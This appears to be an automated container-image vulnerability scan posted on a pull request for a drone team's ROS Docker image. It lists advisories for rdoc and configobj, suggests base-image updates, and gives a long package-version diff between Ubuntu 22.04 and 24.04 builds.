rdoc 6.5.0 (gem) pkg:gem/rdoc@6.5.0 # Dockerfile (82:84) RUN --mount=type=cache,target=/var/cache/apt,sharing=locked,id=cache-apt-$TARGETARCH-$TARGETVARIANT \ --mount=type=cache,target=/var/lib/apt,sharing=locked,id=lib-apt-$TARGETARCH-$TARGETVARIANT \ apt-get update && apt --no-install-recommends install -y cppzmq-dev gz-harmonic && apt-mark auto cppzmq-dev Deserialization of Untrusted Data Affected range >=6.5.0 <6.5.1.1 Fixed version 6.5.1.1 CVSS Score 2.3 CVSS Vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N EPSS Score 2.463% EPSS Percentile 85th percentile Description An issue was discovered in RDoc 6.3.3 through 6.6.2, as distributed in Ruby 3.x through 3.3.0. When parsing .rdoc_options (used for configuration in RDoc) as a YAML file, object injection and resultant remote code execution are possible because there are no restrictions on the classes that can be restored. When loading the documentation cache, object injection and resultant remote code execution are also possible if there were a crafted cache. We recommend to update the RDoc gem to version 6.6.3.1 or later. In order to ensure compatibility with bundled version in older Ruby series, you may update as follows instead: For Ruby 3.0 users: Update to rdoc 6.3.4.1 For Ruby 3.1 users: Update to rdoc 6.4.1.1 For Ruby 3.2 users: Update to rdoc 6.5.1.1 You can use gem update rdoc to update it. If you are using bundler, please add gem "rdoc", ">= 6.6.3.1" to your Gemfile. Note: 6.3.4, 6.4.1, 6.5.1 and 6.6.3 have a incorrect fix. We recommend to upgrade 6.3.4.1, 6.4.1.1, 6.5.1.1 and 6.6.3.1 instead of them.

configobj 5.0.8 (pypi) pkg:pypi/configobj@5.0.8 # Dockerfile (54:56) RUN --mount=type=cache,target=/var/cache/apt,sharing=locked,id=cache-apt-$TARGETARCH-$TARGETVARIANT \ --mount=type=cache,target=/var/lib/apt,sharing=locked,id=lib-apt-$TARGETARCH-$TARGETVARIANT \ apt-get update && apt --no-install-recommends install -y ros-dev-tools Inefficient Regular Expression Complexity Affected range <5.0.9 Fixed version 5.0.9 CVSS Score 3.7 CVSS Vector CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L EPSS Score 0.070% EPSS Percentile 21st percentile Description All versions of the package configobj are vulnerable to Regular Expression Denial of Service (ReDoS) via the validate function, using (.+?)((.*)). Note: This is only exploitable in the case of a developer, putting the offending value in a server side configuration file.

[github-actions]

Recommended fixes for image (linux/amd64) ghcr.io/cuautodrone/cuad-ros:test

Base image is ubuntu:24.04

Name	24.04
Digest	sha256:98ff7968124952e719a8a69bb3cccdd217f5fe758108ac4f21ad22e1df44d237
Vulnerabilities
Pushed	2 weeks ago
Size	30 MB
Packages	131
OS	24.04

The base image is also available under the supported tag(s): latest, noble

Refresh base image

Rebuild the image using a newer base image version. Updating this may result in breaking changes.

✅ This image version is up to date.

Change base image

Tag	Details	Pushed	Vulnerabilities
26.04 Major OS version update Also known as: devel resolute resolute-20260108	Benefits: Image contains 9 fewer packages Image has similar size Image introduces no new vulnerability but removes 9 Major OS version update Image details: Size: 34 MB OS: 26.04	1 month ago
25.10 Major OS version update Also known as: rolling questing questing-20251217	Benefits: Image contains 7 fewer packages Image has similar size Image introduces no new vulnerability but removes 9 Major OS version update Image details: Size: 34 MB OS: 25.10	2 months ago

[JLP04]

Overview

Image reference	ghcr.io/cuautodrone/cuad-ros:latest	ghcr.io/cuautodrone/cuad-ros:test
- digest	bf1449acd12e	b59d7b5afcc1
- tag	latest	test
- provenance	https://github.com/CUAutoDrone/cuad-docker-ros.git#refs/pull/19/merge/commit/87a41d56c5c353b31e1396c89a917af07ecb30e7	https://github.com/CUAutoDrone/cuad-docker-ros.git#refs/pull/20/merge/commit/dfb1d00fa154ace9160576e250fb791600182fe8
- vulnerabilities
- platform	linux/amd64	linux/amd64
- size	2.9 GB	4.7 GB (+1.7 GB)
- packages	2288	2476 (+188)
Base Image	ubuntu:22.04 also known as: • jammy	ubuntu:24.04 also known as: • latest • noble
- vulnerabilities

Labels (1 changes)

• ± 1 changed
• 3 unchanged

 name=cuad-ros
 org.opencontainers.image.authors=cuautodrone
 org.opencontainers.image.ref.name=ubuntu
-org.opencontainers.image.version=22.04
+org.opencontainers.image.version=24.04

Packages and Vulnerabilities (3003 package changes and 236 vulnerability changes)

• ➕ 864 packages added
• ➖ 682 packages removed
• ♾️ 1457 packages changed
• 134 packages unchanged

• ❗ 10 vulnerabilities added
• ✔️ 226 vulnerabilities removed

Changes for packages of type deb (2656 changes)

	Package	Version ghcr.io/cuautodrone/cuad-ros:latest	Version ghcr.io/cuautodrone/cuad-ros:test
♾️	adduser	3.118ubuntu5	3.137ubuntu1
♾️	adwaita-icon-theme	41.0-1ubuntu1	46.0-1
♾️	apt	2.4.14	2.8.3
♾️	astyle	3.1-2build1	3.1-3build1
➕	at-spi2-common		2.52.0-1build1
♾️	autoconf	2.71-2	2.71-3
♾️	automake	1:1.16.5-1.3	1:1.16.5-1.3ubuntu1
♾️	base-files	12ubuntu4.7	13ubuntu10.4
♾️	base-passwd	3.5.52build1	3.6.3build1
♾️	bash	5.1-6ubuntu1.1	5.2.21-2ubuntu4
♾️	binutils	2.38-4ubuntu2.12	2.42-4ubuntu2.8
♾️	binutils-arm-linux-gnueabihf	2.38-4ubuntu2.12	2.42-4ubuntu2.8
♾️	binutils-common	2.38-4ubuntu2.12	2.42-4ubuntu2.8
♾️	binutils-x86-64-linux-gnu	2.38-4ubuntu2.12	2.42-4ubuntu2.8
♾️	blt	2.5.3+dfsg-4.1build2	2.5.3+dfsg-7build1
➕	brz		3.3.5-6build2
♾️	bsdutils	1:2.37.2-4ubuntu3.4	1:2.39.3-9ubuntu6.4
♾️	build-essential	12.9ubuntu3	12.10ubuntu1
♾️	bzip2	1.0.8-5build1	1.0.8-5.1build0.1
➕	bzr		2.7.0+bzr6622+brz
♾️	ca-certificates	20240203~22.04.1	20240203
♾️	ca-certificates-java	20190909ubuntu1.2	20240118
♾️	catch2	2.13.8-1	3.4.0-1build1
♾️	ccache	4.5.1-1	4.9.1-1
♾️	cmake	3.22.1-1ubuntu1.22.04.2	3.28.3-1build7
♾️	cmake-data	3.22.1-1ubuntu1.22.04.2	3.28.3-1build7
♾️	comerr-dev	2.1-1.46.5-2ubuntu1.2	2.1-1.47.0-2.4~exp1ubuntu4.1
♾️	coreutils	8.32-4.1ubuntu1.2	9.4-3ubuntu6.1
♾️	cpp	4:11.2.0-1ubuntu1	4:13.2.0-7ubuntu1
➖	cpp-11	11.4.0-1ubuntu1~22.04.2
➖	cpp-11-arm-linux-gnueabihf	11.4.0-1ubuntu1~22.04cross1
➕	cpp-13		13.3.0-6ubuntu2~24.04.1
➕	cpp-13-arm-linux-gnueabihf		13.3.0-6ubuntu2~24.04cross1
➕	cpp-13-x86-64-linux-gnu		13.3.0-6ubuntu2~24.04.1
♾️	cpp-arm-linux-gnueabihf	4:11.2.0-1ubuntu1	4:13.2.0-7ubuntu1
➕	cpp-x86-64-linux-gnu		4:13.2.0-7ubuntu1
♾️	cppcheck	2.7-1	2.13.0-2ubuntu3
➕	cppzmq-dev		4.10.0-1build1
♾️	curl	7.81.0-1ubuntu1.21	8.5.0-2ubuntu10.6
♾️	dash	0.5.11+git20210903+057cd650a4ed-3build1	0.5.12-6ubuntu5
♾️	dbus	1.12.20-2ubuntu4.1	1.14.10-4ubuntu4.1
➕	dbus-bin		1.14.10-4ubuntu4.1
➕	dbus-daemon		1.14.10-4ubuntu4.1
➕	dbus-session-bus-common		1.14.10-4ubuntu4.1
➕	dbus-system-bus-common		1.14.10-4ubuntu4.1
♾️	dbus-user-session	1.12.20-2ubuntu4.1	1.14.10-4ubuntu4.1
♾️	dconf-gsettings-backend	0.40.0-3ubuntu0.1	0.40.0-4ubuntu0.1
♾️	dconf-service	0.40.0-3ubuntu0.1	0.40.0-4ubuntu0.1
♾️	debconf	1.5.79ubuntu1	1.5.86ubuntu1
♾️	debianutils	5.5-1ubuntu2	5.17build1
♾️	default-jdk	2:1.11-72build2	2:1.21-75+exp1
♾️	default-jdk-headless	2:1.11-72build2	2:1.21-75+exp1
♾️	default-jre	2:1.11-72build2	2:1.21-75+exp1
♾️	default-jre-headless	2:1.11-72build2	2:1.21-75+exp1
♾️	default-libmysqlclient-dev	1.0.8	1.1.0build1
➖	dh-elpa-helper	2.0.9ubuntu1
♾️	diffutils	1:3.8-0ubuntu2	1:3.10-1build1
♾️	dirmngr	2.2.27-3ubuntu2.4	2.4.4-2ubuntu17.4
♾️	distro-info-data	0.52ubuntu0.11	0.60ubuntu0.5
♾️	docutils-common	0.17.1+dfsg-2	0.20.1+dfsg-3
♾️	dpkg	1.21.1ubuntu2.6	1.22.6ubuntu6.5
♾️	dpkg-dev	1.21.1ubuntu2.6	1.22.6ubuntu6.5
♾️	e2fsprogs	1.46.5-2ubuntu1.2	1.47.0-2.4~exp1ubuntu4.1
➖	emacsen-common	3.0.4
♾️	file	1:5.41-3ubuntu0.1	1:5.45-3build1
♾️	findutils	4.8.0-1ubuntu3	4.9.0-5build1
♾️	fontconfig	2.13.1-4.2ubuntu5	2.15.0-1.1ubuntu2
♾️	fontconfig-config	2.13.1-4.2ubuntu5	2.15.0-1.1ubuntu2
♾️	fonts-dejavu-core	2.37-2build1	2.37-8
➕	fonts-dejavu-mono		2.37-8
♾️	fonts-freefont-ttf	20120503-10build1	20211204+svn4273-2
♾️	fonts-lyx	2.3.6-1	2.4.0~RC3-1build4
♾️	g++	4:11.2.0-1ubuntu1	4:13.2.0-7ubuntu1
➖	g++-11	11.4.0-1ubuntu1~22.04.2
➖	g++-11-arm-linux-gnueabihf	11.4.0-1ubuntu1~22.04cross1
➕	g++-13		13.3.0-6ubuntu2~24.04.1
➕	g++-13-arm-linux-gnueabihf		13.3.0-6ubuntu2~24.04cross1
➕	g++-13-x86-64-linux-gnu		13.3.0-6ubuntu2~24.04.1
♾️	g++-arm-linux-gnueabihf	4:11.2.0-1ubuntu1	4:13.2.0-7ubuntu1
➕	g++-x86-64-linux-gnu		4:13.2.0-7ubuntu1
♾️	gawk	1:5.1.0-1ubuntu0.1	1:5.2.1-2build3
♾️	gcc	4:11.2.0-1ubuntu1	4:13.2.0-7ubuntu1
➖	gcc-11	11.4.0-1ubuntu1~22.04.2
➖	gcc-11-arm-linux-gnueabihf	11.4.0-1ubuntu1~22.04cross1
➖	gcc-11-arm-linux-gnueabihf-base	11.4.0-1ubuntu1~22.04cross1
➖	gcc-11-base	11.4.0-1ubuntu1~22.04.2
➖	gcc-11-cross-base	11.4.0-1ubuntu1~22.04cross1
➖	gcc-12-base	12.3.0-1ubuntu1~22.04.2
➖	gcc-12-cross-base	12.3.0-1ubuntu1~22.04cross1
➕	gcc-13		13.3.0-6ubuntu2~24.04.1
➕	gcc-13-arm-linux-gnueabihf		13.3.0-6ubuntu2~24.04cross1
➕	gcc-13-arm-linux-gnueabihf-base		13.3.0-6ubuntu2~24.04cross1
➕	gcc-13-base		13.3.0-6ubuntu2~24.04.1
➕	gcc-13-cross-base		13.3.0-6ubuntu2~24.04cross1
➕	gcc-13-x86-64-linux-gnu		13.3.0-6ubuntu2~24.04.1
➕	gcc-14-base		14.2.0-4ubuntu2~24.04.1
➕	gcc-14-cross-base		14.2.0-4ubuntu2~24.04cross1
♾️	gcc-arm-linux-gnueabihf	4:11.2.0-1ubuntu1	4:13.2.0-7ubuntu1
➕	gcc-x86-64-linux-gnu		4:13.2.0-7ubuntu1
♾️	gcovr	5.0-2	7.0-1
♾️	gdal-data	3.4.1+dfsg-1build4	3.8.4+dfsg-3ubuntu3
➕	gdal-plugins		3.8.4+dfsg-3ubuntu3
♾️	geographiclib-tools	1.52-1	2.3-1build1
➖	gfortran-11	11.4.0-1ubuntu1~22.04.2
➕	gfortran-13		13.3.0-6ubuntu2~24.04.1
➕	gfortran-13-x86-64-linux-gnu		13.3.0-6ubuntu2~24.04.1
♾️	gir1.2-atk-1.0	2.36.0-3build1	2.52.0-1build1
➕	gir1.2-atspi-2.0		2.52.0-1build1
♾️	gir1.2-freedesktop	1.72.0-1	1.80.1-1
➕	gir1.2-freedesktop-dev		1.80.1-1
♾️	gir1.2-gdkpixbuf-2.0	2.42.8+dfsg-1ubuntu0.4	2.42.10+dfsg-3ubuntu3.2
➕	gir1.2-girepository-2.0		1.80.1-1
♾️	gir1.2-glib-2.0	1.72.0-1	2.80.0-6ubuntu3.8
➕	gir1.2-glib-2.0-dev		2.80.0-6ubuntu3.8
♾️	gir1.2-gst-plugins-base-1.0	1.20.1-1ubuntu0.5	1.24.2-1ubuntu0.3
♾️	gir1.2-gstreamer-1.0	1.20.3-0ubuntu1.1	1.24.2-1ubuntu0.1
♾️	gir1.2-gtk-3.0	3.24.33-1ubuntu2.2	3.24.41-4ubuntu1.3
♾️	gir1.2-gudev-1.0	1:237-2build1	1:238-5ubuntu1
♾️	gir1.2-harfbuzz-0.0	2.7.4-1ubuntu3.2	8.3.0-2build2
♾️	gir1.2-ibus-1.0	1.5.26-4	1.5.29-2
♾️	gir1.2-packagekitglib-1.0	1.2.5-2ubuntu3	1.2.8-2ubuntu1.4
♾️	gir1.2-pango-1.0	1.50.6+ds-2ubuntu1	1.52.1+ds-1build1
♾️	git	1:2.34.1-1ubuntu1.15	1:2.43.0-1ubuntu7.3
♾️	git-gui	1:2.34.1-1ubuntu1.15	1:2.43.0-1ubuntu7.3
♾️	git-man	1:2.34.1-1ubuntu1.15	1:2.43.0-1ubuntu7.3
♾️	gitk	1:2.34.1-1ubuntu1.15	1:2.43.0-1ubuntu7.3
♾️	glib-networking	2.72.0-1	2.80.0-1build1
♾️	glib-networking-common	2.72.0-1	2.80.0-1build1
♾️	glib-networking-services	2.72.0-1	2.80.0-1build1
♾️	gnupg	2.2.27-3ubuntu2.4	2.4.4-2ubuntu17.4
➖	gnupg-l10n	2.2.27-3ubuntu2.4
♾️	gnupg-utils	2.2.27-3ubuntu2.4	2.4.4-2ubuntu17.4
♾️	google-mock	1.11.0-3	1.14.0-1
♾️	googletest	1.11.0-3	1.14.0-1
♾️	gpg	2.2.27-3ubuntu2.4	2.4.4-2ubuntu17.4
♾️	gpg-agent	2.2.27-3ubuntu2.4	2.4.4-2ubuntu17.4
➖	gpg-wks-client	2.2.27-3ubuntu2.4
➖	gpg-wks-server	2.2.27-3ubuntu2.4
♾️	gpgconf	2.2.27-3ubuntu2.4	2.4.4-2ubuntu17.4
♾️	gpgsm	2.2.27-3ubuntu2.4	2.4.4-2ubuntu17.4
♾️	gpgv	2.2.27-3ubuntu2.4	2.4.4-2ubuntu17.4
		Removed vulnerabilities (1):
♾️	graphviz	2.42.2-6ubuntu0.1	2.42.2-9ubuntu0.1
♾️	grep	3.7-1build1	3.11-4build1
♾️	gsettings-desktop-schemas	42.0-1ubuntu1	46.1-0ubuntu1
♾️	gstreamer1.0-gl	1.20.1-1ubuntu0.5	1.24.2-1ubuntu0.3
♾️	gstreamer1.0-libav	1.20.3-0ubuntu1	1.24.1-1build1
♾️	gstreamer1.0-plugins-bad	1.20.3-0ubuntu1.1	1.24.2-1ubuntu4
♾️	gstreamer1.0-plugins-base	1.20.1-1ubuntu0.5	1.24.2-1ubuntu0.3
♾️	gstreamer1.0-plugins-good	1.20.3-0ubuntu1.4	1.24.2-1ubuntu1.2
♾️	gtk-update-icon-cache	3.24.33-1ubuntu2.2	3.24.41-4ubuntu1.3
♾️	gz-harmonic	1.0.0-1~jammy	1.0.0-1~noble
♾️	gz-launch7-cli	7.1.1-1~jammy	7.1.1-1~noble
♾️	gz-plugin2-cli	2.0.4-1~jammy	2.0.4-1~noble
♾️	gz-sim8-cli	8.10.0-1~jammy	8.10.0-1~noble
♾️	gz-tools2	2.0.3-1~jammy	2.0.3-1~noble
♾️	gz-transport13-cli	13.5.0-1~jammy	13.5.0-1~noble
♾️	gzip	1.10-4ubuntu4.1	1.12-1ubuntu3.1
♾️	hdf5-helpers	1.10.7+repack-4ubuntu2	1.10.10+repack-3.1ubuntu4
♾️	hostname	3.23ubuntu2	3.23+nmu2ubuntu2
♾️	ibverbs-providers	39.0-1	50.0-2ubuntu0.2
♾️	icu-devtools	70.1-2	74.2-1ubuntu3.1
♾️	init-system-helpers	1.62	1.66ubuntu1
♾️	iso-codes	4.9.0-1	4.16.0-1
♾️	java-common	0.72build2	0.75+exp1
♾️	keyboard-configuration	1.205ubuntu3	1.226ubuntu1
➕	keyboxd		2.4.4-2ubuntu17.4
♾️	krb5-multidev	1.19.2-2ubuntu0.7	1.20.1-6ubuntu2.6
♾️	lcov	1.15-1	2.0-4ubuntu2
♾️	libaa1	1.4p5-50build1	1.4p5-51.1
♾️	libacl1	2.3.1-1	2.3.2-1build1.1
♾️	libaec-dev	1.0.6-1	1.1.2-1build1
♾️	libaec0	1.0.6-1	1.1.2-1build1
➕	libalgorithm-c3-perl		0.11-2
➕	libamd-comgr2		6.0+git20231212.4510c28+dfsg-3build2
➕	libamdhip64-5		5.7.1-3
♾️	libann0	1.1.2+doc-7build1	1.1.2+doc-9build1
♾️	libaom-dev	3.3.0-1ubuntu0.1	3.8.2-2ubuntu0.1
♾️	libaom3	3.3.0-1ubuntu0.1	3.8.2-2ubuntu0.1
♾️	libapparmor1	3.0.4-2ubuntu2.5	4.0.1really4.0.1-0ubuntu0.24.04.5
➖	libappstream4	0.15.2-2
➕	libappstream5		1.0.2-1build6
➕	libapr1t64		1.7.2-3.1ubuntu0.1
➕	libaprutil1t64		1.6.3-1.1ubuntu7
➖	libapt-pkg6.0	2.4.14
➕	libapt-pkg6.0t64		2.8.3
➖	libarchive13	3.6.0-1ubuntu1.5
➕	libarchive13t64		3.7.2-2ubuntu0.5
♾️	libargon2-1	0~20171227-0.3	0~20190702+dfsg-4build1
♾️	libarmadillo-dev	1:10.8.2+dfsg-1	1:12.6.7+dfsg-1build2
➖	libarmadillo10	1:10.8.2+dfsg-1
➕	libarmadillo12		1:12.6.7+dfsg-1build2
➖	libarpack2	3.8.0-1
♾️	libarpack2-dev	3.8.0-1	3.9.1-1.1build2
➕	libarpack2t64		3.9.1-1.1build2
➖	libasan6	11.4.0-1ubuntu1~22.04.2
➖	libasan6-armhf-cross	11.4.0-1ubuntu1~22.04cross1
➕	libasan8		14.2.0-4ubuntu2~24.04.1
➕	libasan8-armhf-cross		14.2.0-4ubuntu2~24.04cross1
♾️	libasio-dev	1:1.18.1-1	1:1.28.1-0.2
➖	libasound2	1.2.6.1-1ubuntu1
		Removed vulnerabilities (1):
♾️	libasound2-data	1.2.6.1-1ubuntu1	1.2.11-1ubuntu0.2
♾️	libasound2-dev	1.2.6.1-1ubuntu1	1.2.11-1ubuntu0.2
➕	libasound2t64		1.2.11-1ubuntu0.2
♾️	libass9	1:0.15.2-1	1:0.17.1-2build1
♾️	libassimp-dev	5.2.2~ds0-1	5.3.1+ds-2build1
♾️	libassimp5	5.2.2~ds0-1	5.3.1+ds-2build1
♾️	libassuan0	2.5.5-1build1	2.5.6-1build1
♾️	libasyncns0	0.8-6build2	0.8-6build4
➖	libatk-bridge2.0-0	2.38.0-3
➕	libatk-bridge2.0-0t64		2.52.0-1build1
➕	libatk-bridge2.0-dev		2.52.0-1build1
➖	libatk1.0-0	2.36.0-3build1
➕	libatk1.0-0t64		2.52.0-1build1
➖	libatk1.0-data	2.36.0-3build1
➕	libatk1.0-dev		2.52.0-1build1
♾️	libatomic1	12.3.0-1ubuntu1~22.04.2	14.2.0-4ubuntu2~24.04.1
♾️	libatomic1-armhf-cross	12.3.0-1ubuntu1~22.04cross1	14.2.0-4ubuntu2~24.04cross1
➖	libatspi2.0-0	2.44.0-3
➕	libatspi2.0-0t64		2.52.0-1build1
➕	libatspi2.0-dev		2.52.0-1build1
♾️	libattr1	1:2.5.1-1build1	1:2.5.2-1build1.1
♾️	libaudit-common	1:3.0.7-1build1	1:3.1.2-2.1build1.1
♾️	libaudit1	1:3.0.7-1build1	1:3.1.2-2.1build1.1
♾️	libavahi-client3	0.8-5ubuntu5.3	0.8-13ubuntu6.1
♾️	libavahi-common-data	0.8-5ubuntu5.3	0.8-13ubuntu6.1
♾️	libavahi-common3	0.8-5ubuntu5.3	0.8-13ubuntu6.1
		Removed vulnerabilities (3):
♾️	libavc1394-0	0.5.4-5build2	0.5.4-5build3
♾️	libavcodec-dev	7:4.4.2-0ubuntu0.22.04.1	7:6.1.1-3ubuntu5
➖	libavcodec58	7:4.4.2-0ubuntu0.22.04.1
➕	libavcodec60		7:6.1.1-3ubuntu5
♾️	libavdevice-dev	7:4.4.2-0ubuntu0.22.04.1	7:6.1.1-3ubuntu5
➖	libavdevice58	7:4.4.2-0ubuntu0.22.04.1
➕	libavdevice60		7:6.1.1-3ubuntu5
♾️	libavfilter-dev	7:4.4.2-0ubuntu0.22.04.1	7:6.1.1-3ubuntu5
➖	libavfilter7	7:4.4.2-0ubuntu0.22.04.1
➕	libavfilter9		7:6.1.1-3ubuntu5
♾️	libavformat-dev	7:4.4.2-0ubuntu0.22.04.1	7:6.1.1-3ubuntu5
➖	libavformat58	7:4.4.2-0ubuntu0.22.04.1
➕	libavformat60		7:6.1.1-3ubuntu5
➕	libavtp0		0.2.0-1build1
♾️	libavutil-dev	7:4.4.2-0ubuntu0.22.04.1	7:6.1.1-3ubuntu5
➖	libavutil56	7:4.4.2-0ubuntu0.22.04.1
➕	libavutil58		7:6.1.1-3ubuntu5
➕	libb-hooks-endofscope-perl		0.28-1
➕	libb-hooks-op-check-perl		0.22-3build1
♾️	libbinutils	2.38-4ubuntu2.12	2.42-4ubuntu2.8
♾️	libblas-dev	3.10.0-2ubuntu1	3.12.0-3build1.1
♾️	libblas3	3.10.0-2ubuntu1	3.12.0-3build1.1
♾️	libblkid-dev	2.37.2-4ubuntu3.4	2.39.3-9ubuntu6.4
♾️	libblkid1	2.37.2-4ubuntu3.4	2.39.3-9ubuntu6.4
♾️	libblosc-dev	1.21.1+ds2-2	1.21.5+ds-1build1
♾️	libblosc1	1.21.1+ds2-2	1.21.5+ds-1build1
♾️	libbluray2	1:1.3.1-1	1:1.3.4-1build1
♾️	libboost-all-dev	1.74.0.3ubuntu7	1.83.0.1ubuntu2
♾️	libboost-atomic-dev	1.74.0.3ubuntu7	1.83.0.1ubuntu2
➖	libboost-atomic1.74-dev	1.74.0-14ubuntu3
➖	libboost-atomic1.74.0	1.74.0-14ubuntu3
➕	libboost-atomic1.83-dev		1.83.0-2.1ubuntu3.2
➕	libboost-atomic1.83.0		1.83.0-2.1ubuntu3.2
♾️	libboost-chrono-dev	1.74.0.3ubuntu7	1.83.0.1ubuntu2
➖	libboost-chrono1.74-dev	1.74.0-14ubuntu3
➖	libboost-chrono1.74.0	1.74.0-14ubuntu3
➕	libboost-chrono1.83-dev		1.83.0-2.1ubuntu3.2
➕	libboost-chrono1.83.0t64		1.83.0-2.1ubuntu3.2
♾️	libboost-container-dev	1.74.0.3ubuntu7	1.83.0.1ubuntu2
➖	libboost-container1.74-dev	1.74.0-14ubuntu3
➖	libboost-container1.74.0	1.74.0-14ubuntu3
➕	libboost-container1.83-dev		1.83.0-2.1ubuntu3.2
➕	libboost-container1.83.0		1.83.0-2.1ubuntu3.2
♾️	libboost-context-dev	1.74.0.3ubuntu7	1.83.0.1ubuntu2
➖	libboost-context1.74-dev	1.74.0-14ubuntu3
➖	libboost-context1.74.0	1.74.0-14ubuntu3
➕	libboost-context1.83-dev		1.83.0-2.1ubuntu3.2
➕	libboost-context1.83.0		1.83.0-2.1ubuntu3.2
♾️	libboost-coroutine-dev	1.74.0.3ubuntu7	1.83.0.1ubuntu2
➖	libboost-coroutine1.74-dev	1.74.0-14ubuntu3
➖	libboost-coroutine1.74.0	1.74.0-14ubuntu3
➕	libboost-coroutine1.83-dev		1.83.0-2.1ubuntu3.2
➕	libboost-coroutine1.83.0		1.83.0-2.1ubuntu3.2
♾️	libboost-date-time-dev	1.74.0.3ubuntu7	1.83.0.1ubuntu2
➖	libboost-date-time1.74-dev	1.74.0-14ubuntu3
➖	libboost-date-time1.74.0	1.74.0-14ubuntu3
➕	libboost-date-time1.83-dev		1.83.0-2.1ubuntu3.2
➕	libboost-date-time1.83.0		1.83.0-2.1ubuntu3.2
♾️	libboost-dev	1.74.0.3ubuntu7	1.83.0.1ubuntu2
♾️	libboost-exception-dev	1.74.0.3ubuntu7	1.83.0.1ubuntu2
➖	libboost-exception1.74-dev	1.74.0-14ubuntu3
➕	libboost-exception1.83-dev		1.83.0-2.1ubuntu3.2
♾️	libboost-fiber-dev	1.74.0.3ubuntu7	1.83.0.1ubuntu2
➖	libboost-fiber1.74-dev	1.74.0-14ubuntu3
➖	libboost-fiber1.74.0	1.74.0-14ubuntu3
➕	libboost-fiber1.83-dev		1.83.0-2.1ubuntu3.2
➕	libboost-fiber1.83.0		1.83.0-2.1ubuntu3.2
♾️	libboost-filesystem-dev	1.74.0.3ubuntu7	1.83.0.1ubuntu2
➖	libboost-filesystem1.74-dev	1.74.0-14ubuntu3

[JLP04]

Packages and Vulnerabilities (3003 package changes and 236 vulnerability changes)

• ➕ 864 packages added
• ➖ 682 packages removed
• ♾️ 1457 packages changed
• 134 packages unchanged

• ❗ 10 vulnerabilities added
• ✔️ 226 vulnerabilities removed

Changes for packages of type deb (2656 changes)

➖	libboost-filesystem1.74.0	1.74.0-14ubuntu3
➕	libboost-filesystem1.83-dev		1.83.0-2.1ubuntu3.2
➕	libboost-filesystem1.83.0		1.83.0-2.1ubuntu3.2
♾️	libboost-graph-dev	1.74.0.3ubuntu7	1.83.0.1ubuntu2
♾️	libboost-graph-parallel-dev	1.74.0.3ubuntu7	1.83.0.1ubuntu2
➖	libboost-graph-parallel1.74-dev	1.74.0-14ubuntu3
➖	libboost-graph-parallel1.74.0	1.74.0-14ubuntu3
➕	libboost-graph-parallel1.83-dev		1.83.0-2.1ubuntu3.2
➕	libboost-graph-parallel1.83.0		1.83.0-2.1ubuntu3.2
➖	libboost-graph1.74-dev	1.74.0-14ubuntu3
➖	libboost-graph1.74.0	1.74.0-14ubuntu3
➕	libboost-graph1.83-dev		1.83.0-2.1ubuntu3.2
➕	libboost-graph1.83.0		1.83.0-2.1ubuntu3.2
♾️	libboost-iostreams-dev	1.74.0.3ubuntu7	1.83.0.1ubuntu2
➖	libboost-iostreams1.74-dev	1.74.0-14ubuntu3
➖	libboost-iostreams1.74.0	1.74.0-14ubuntu3
➕	libboost-iostreams1.83-dev		1.83.0-2.1ubuntu3.2
➕	libboost-iostreams1.83.0		1.83.0-2.1ubuntu3.2
➕	libboost-json-dev		1.83.0.1ubuntu2
➕	libboost-json1.83-dev		1.83.0-2.1ubuntu3.2
➕	libboost-json1.83.0		1.83.0-2.1ubuntu3.2
♾️	libboost-locale-dev	1.74.0.3ubuntu7	1.83.0.1ubuntu2
➖	libboost-locale1.74-dev	1.74.0-14ubuntu3
➖	libboost-locale1.74.0	1.74.0-14ubuntu3
➕	libboost-locale1.83-dev		1.83.0-2.1ubuntu3.2
➕	libboost-locale1.83.0		1.83.0-2.1ubuntu3.2
♾️	libboost-log-dev	1.74.0.3ubuntu7	1.83.0.1ubuntu2
➖	libboost-log1.74-dev	1.74.0-14ubuntu3
➖	libboost-log1.74.0	1.74.0-14ubuntu3
➕	libboost-log1.83-dev		1.83.0-2.1ubuntu3.2
➕	libboost-log1.83.0		1.83.0-2.1ubuntu3.2
♾️	libboost-math-dev	1.74.0.3ubuntu7	1.83.0.1ubuntu2
➖	libboost-math1.74-dev	1.74.0-14ubuntu3
➖	libboost-math1.74.0	1.74.0-14ubuntu3
➕	libboost-math1.83-dev		1.83.0-2.1ubuntu3.2
➕	libboost-math1.83.0		1.83.0-2.1ubuntu3.2
♾️	libboost-mpi-dev	1.74.0.3ubuntu7	1.83.0.1ubuntu2
♾️	libboost-mpi-python-dev	1.74.0.3ubuntu7	1.83.0.1ubuntu2
➖	libboost-mpi-python1.74-dev	1.74.0-14ubuntu3
➖	libboost-mpi-python1.74.0	1.74.0-14ubuntu3
➕	libboost-mpi-python1.83-dev		1.83.0-2.1ubuntu3.2
➕	libboost-mpi-python1.83.0		1.83.0-2.1ubuntu3.2
➖	libboost-mpi1.74-dev	1.74.0-14ubuntu3
➖	libboost-mpi1.74.0	1.74.0-14ubuntu3
➕	libboost-mpi1.83-dev		1.83.0-2.1ubuntu3.2
➕	libboost-mpi1.83.0		1.83.0-2.1ubuntu3.2
♾️	libboost-nowide-dev	1.74.0.3ubuntu7	1.83.0.1ubuntu2
➖	libboost-nowide1.74-dev	1.74.0-14ubuntu3
➖	libboost-nowide1.74.0	1.74.0-14ubuntu3
➕	libboost-nowide1.83-dev		1.83.0-2.1ubuntu3.2
➕	libboost-nowide1.83.0		1.83.0-2.1ubuntu3.2
♾️	libboost-numpy-dev	1.74.0.3ubuntu7	1.83.0.1ubuntu2
➖	libboost-numpy1.74-dev	1.74.0-14ubuntu3
➖	libboost-numpy1.74.0	1.74.0-14ubuntu3
➕	libboost-numpy1.83-dev		1.83.0-2.1ubuntu3.2
➕	libboost-numpy1.83.0		1.83.0-2.1ubuntu3.2
♾️	libboost-program-options-dev	1.74.0.3ubuntu7	1.83.0.1ubuntu2
➖	libboost-program-options1.74-dev	1.74.0-14ubuntu3
➖	libboost-program-options1.74.0	1.74.0-14ubuntu3
➕	libboost-program-options1.83-dev		1.83.0-2.1ubuntu3.2
➕	libboost-program-options1.83.0		1.83.0-2.1ubuntu3.2
♾️	libboost-python-dev	1.74.0.3ubuntu7	1.83.0.1ubuntu2
➖	libboost-python1.74-dev	1.74.0-14ubuntu3
➖	libboost-python1.74.0	1.74.0-14ubuntu3
➕	libboost-python1.83-dev		1.83.0-2.1ubuntu3.2
